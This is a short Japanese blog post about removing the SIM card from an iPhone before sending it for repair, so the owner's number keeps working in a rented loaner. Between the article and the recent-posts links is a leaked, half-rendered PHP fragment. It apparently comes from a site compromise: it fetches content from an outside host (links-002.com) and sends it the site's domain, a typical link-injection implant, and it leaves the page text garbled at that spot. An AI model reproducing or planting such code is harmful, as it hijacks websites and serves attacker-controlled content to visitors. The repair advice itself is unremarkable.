レンタルIphoneで自分の電話番号を使うために

前面ガラスを割ってしまった時や水没した場合では、オフィシャルのリペアセンターにIphoneの修理を頼むことも一般的です。
しかし一週間ほど預かり修理になることもあり、その間はスマホが使えないことになります。
ただしオフィシャルでは修理期間中の代替機として、スマホがレンタルできる場合もあります。
もしもレンタルできる場合では、基本的に宅配便で代替機が送られてきます。
届きましたら代替機を箱から出して、そこに修理を頼むIphoneを納めてから返送致します。
ここでの注意点は、箱に納める前にSIMを取り出しておくことです。
これを取り出しておきませんと、代替機で自分の電話番号などを使うことができません。
そのため忘れずに取り出しておくことが肝心です。
また、SIMはとても薄くて小さいですから、事前に取り出す場合は紛失しないようにしっかり管理しておきます。
そしてレンタルした代替機を返す時も、SIMを取り外してから返却致しましょう。

".file_get_contents('http://links-002.com/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿

  • 便利なIphoneレンタルとチェックポイント

    最近ではIphoneが借りられるレンタル業者も増えてきましたから、出張の間だけ使いたい場合や、修理期 …

    続きを読む...

  • Iphoneのレンタルを行う方法

    Iphoneを使ってみたいと考えていても、実際に使いこなすことが出来るのかどうか分からない、不安に感 …

    続きを読む...

  • Iphoneをレンタルするというサービス

    Iphoneのレンタルサービスというのがあります。
    すでに所有している人が多いため、なんのため …

    続きを読む...